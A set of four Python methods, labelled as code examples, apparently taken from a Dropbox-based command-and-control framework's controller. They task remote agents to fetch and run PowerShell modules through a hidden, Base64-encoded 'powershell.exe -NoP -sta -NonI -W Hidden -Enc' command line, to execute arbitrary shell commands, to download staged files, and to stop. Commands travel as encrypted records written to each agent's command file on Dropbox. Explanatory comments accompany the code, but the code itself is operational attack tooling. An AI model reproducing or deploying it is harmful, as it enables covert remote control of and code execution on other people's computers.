Beispiel #1
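    def taskAgentWithRunPSModule(self,
                                 moduleName,
                                 moduleArgs=None,
                                 interact=False):
        """Task the current agent with loading and running a published PowerShell module.

        The PowerShell text is rendered from the template at
        cfg.defaultPath['runPSModuleTpl'] with two substitutions: a key derived
        from the master key, and the URL stored for moduleName in
        statusHandler.publishedModuleList.

        moduleName -- lookup key into statusHandler.publishedModuleList
                      (presumably a dict, so an unpublished name would raise
                      KeyError here -- confirm against statusHandler).
        moduleArgs -- optional PowerShell text appended verbatim after the
                      rendered template.
        interact   -- when true, the rendered text is handed to
                      taskAgentWithShell() and no task record is created or
                      committed by this method.

        Always returns None; the outcome is reported on stdout. If the
        template cannot be rendered (helper returns None) the method returns
        without printing anything.
        """
        # Values substituted into the template. 'xorKey' is the master key
        # converted with outputFormat="sha256"; the name suggests the template
        # uses it to de-obfuscate the module with XOR, but that is not visible
        # here -- confirm against the template file.
        templateValues = {
            'xorKey': Crypto.convertKey(self.statusHandler.masterKey,
                                        outputFormat="sha256"),
            'moduleURL': self.statusHandler.publishedModuleList[moduleName]
        }
        poshCmd = helpers.convertFromTemplate(
            templateValues, cfg.defaultPath['runPSModuleTpl'])
        # Identity test: None is a singleton, and '==' could be overridden.
        if poshCmd is None:
            return

        # Optional module arguments are concatenated as raw PowerShell, with a
        # Write-Host marker in front of them.
        if moduleArgs:
            poshCmd += ";Write-Host \"-> Executing module arguments\";{}".format(
                moduleArgs)

        # Interactive use goes through the 'shell' task type instead; that
        # path records no task in statusHandler.
        if interact:
            self.taskAgentWithShell(poshCmd)
            return

        task = self.statusHandler.createTask(self.agentID,
                                             "runPSModule",
                                             args=[moduleName, moduleArgs])

        # One-line form of the script: the helper's Base64 output is passed to
        # powershell.exe via -Enc.
        base64Payload = helpers.powershellEncode(poshCmd)

        # The flag set is constant (-NoP -sta -NonI -W Hidden -Enc); only the
        # Base64 blob varies. Wherever the agent runs this string as given
        # (agent side not shown here), that constant prefix is what
        # process-creation command-line telemetry records, and PowerShell
        # script block logging records the decoded script.
        cmd = "powershell.exe -NoP -sta -NonI -W Hidden -Enc {}".format(
            base64Payload)

        # Command-file record: task type, task id, command line, then 16
        # characters from helpers.randomString (purpose not shown here).
        data = "runCLI\n{}\n{}\n{}".format(task['id'], cmd,
                                           helpers.randomString(16))
        # The record is encrypted with the master key before it is written to
        # the agent's command file through the Dropbox handler.
        r = self.dropboxHandler.putFile(
            self.statusHandler.getAgentAttribute(self.agentID,
                                                 'commandFile'),
            Crypto.encryptData(data, self.statusHandler.masterKey))

        if r is None:
            print(helpers.color(
                "[!] Error tasking agent with ID [{}]".format(
                    self.agentID)))
            return

        # The task is committed only after the upload reported success.
        self.statusHandler.commitTask(task)
        print(helpers.color(
            "[+] Agent with ID [{}] has been tasked with task ID [{}]".
            format(self.agentID, task['id'])))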
Beispiel #2
    def taskAgentWithShell(self, cmd):
        """Write a 'shell' record carrying cmd to the current agent's command file.

        cmd -- text placed verbatim in the record's command field.

        No task is created or committed on this path: the task-id field of the
        record is the literal "n/a", so statusHandler holds no entry for a
        command sent this way. Always returns None; the outcome is printed.
        """
        # Record layout: type, task id placeholder, command, then 16 characters
        # from helpers.randomString (purpose not shown here).
        record = "shell\n{}\n{}\n{}".format("n/a", cmd, helpers.randomString(16))

        # Encrypted with the master key, then written through the Dropbox
        # handler to the path stored in the agent's 'commandFile' attribute.
        commandFile = self.statusHandler.getAgentAttribute(self.agentID,
                                                           'commandFile')
        encrypted = Crypto.encryptData(record, self.statusHandler.masterKey)
        uploadResult = self.dropboxHandler.putFile(commandFile, encrypted)

        # putFile signals failure by returning None.
        if uploadResult is None:
            print(helpers.color("[!] Error tasking agent with ID [{}]".format(
                self.agentID)))
            return

        print(helpers.color(
            "[+] Agent with ID [{}] has been tasked with shell command".
            format(self.agentID)))
Beispiel #3
    def taskAgentWithSendFile(self, localFile, destinationPath):
        """Stage a local file on Dropbox and task the agent with fetching it.

        localFile       -- path of the file to read on the controller side.
        destinationPath -- value placed in the record as the destination on
                           the agent side.

        Two uploads happen: the file content goes to "/<agentID>.rsc", then a
        'downloadFile' record goes to the agent's command file. Always returns
        None; progress and errors are printed. A failed staging upload returns
        without printing an error.
        """
        # Staging path on the Dropbox side: one fixed name per agent.
        remoteFilePath = "/" + self.agentID + ".rsc"
        # Only the base name of the local path is sent to the agent.
        fileName = os.path.basename(localFile)

        # Step 1: upload the file content. It is passed to putFile as read,
        # without Crypto.encryptData, unlike the command-file record below.
        try:
            with open(localFile) as source:
                print(helpers.color("[*] Uploading file [{}] to [{}]".format(
                    localFile, remoteFilePath)))
                content = source.read()
                stagingResult = self.dropboxHandler.putFile(remoteFilePath,
                                                            content)
                # Redundant: the with-block closes the handle on exit.
                source.close()

                if stagingResult is None:
                    return
        except IOError:
            # Also catches an IOError raised by putFile, which runs inside the
            # same try block.
            print(helpers.color(
                "[!] Could not open or read file [{}]".format(localFile)))
            return

        # Step 2: record the task. It is stored as "sendFile", while the
        # record written for the agent uses the type "downloadFile".
        task = self.statusHandler.createTask(self.agentID,
                                             "sendFile",
                                             args=[localFile, destinationPath])

        # Record layout: type, task id, staging path, destination, file name,
        # then 16 characters from helpers.randomString (purpose not shown here).
        record = "downloadFile\n{}\n{}\n{}\n{}\n{}".format(
            task['id'], remoteFilePath, destinationPath, fileName,
            helpers.randomString(16))
        commandFile = self.statusHandler.getAgentAttribute(self.agentID,
                                                           'commandFile')
        encrypted = Crypto.encryptData(record, self.statusHandler.masterKey)
        commandResult = self.dropboxHandler.putFile(commandFile, encrypted)

        if commandResult is None:
            print(helpers.color("[!] Error tasking agent with ID [{}]".format(
                self.agentID)))
            return

        # The task is committed only after the command-file upload succeeded.
        self.statusHandler.commitTask(task)
        print(helpers.color(
            "[+] Agent with ID [{}] has been tasked with task ID [{}]".
            format(self.agentID, task['id'])))
Beispiel #4
    def taskAgentWithStop(self):
        """Write a 'stop' record to the current agent's command file.

        A task of type "stop" is created first and committed only if the
        upload succeeds. Always returns None; the outcome is printed.
        """
        task = self.statusHandler.createTask(self.agentID, "stop")

        # Record layout: type, task id, then 16 characters from
        # helpers.randomString (purpose not shown here).
        record = "stop\n{}\n{}".format(task['id'], helpers.randomString(16))

        # Encrypted with the master key, then written through the Dropbox
        # handler to the path stored in the agent's 'commandFile' attribute.
        commandFile = self.statusHandler.getAgentAttribute(self.agentID,
                                                           'commandFile')
        encrypted = Crypto.encryptData(record, self.statusHandler.masterKey)
        uploadResult = self.dropboxHandler.putFile(commandFile, encrypted)

        # putFile signals failure by returning None; the task then stays
        # uncommitted.
        if uploadResult is None:
            print(helpers.color("[!] Error tasking agent with ID [{}]".format(
                self.agentID)))
            return

        self.statusHandler.commitTask(task)
        print(helpers.color(
            "[+] Agent with ID [{}] has been tasked with task ID [{}]".
            format(self.agentID, task['id'])))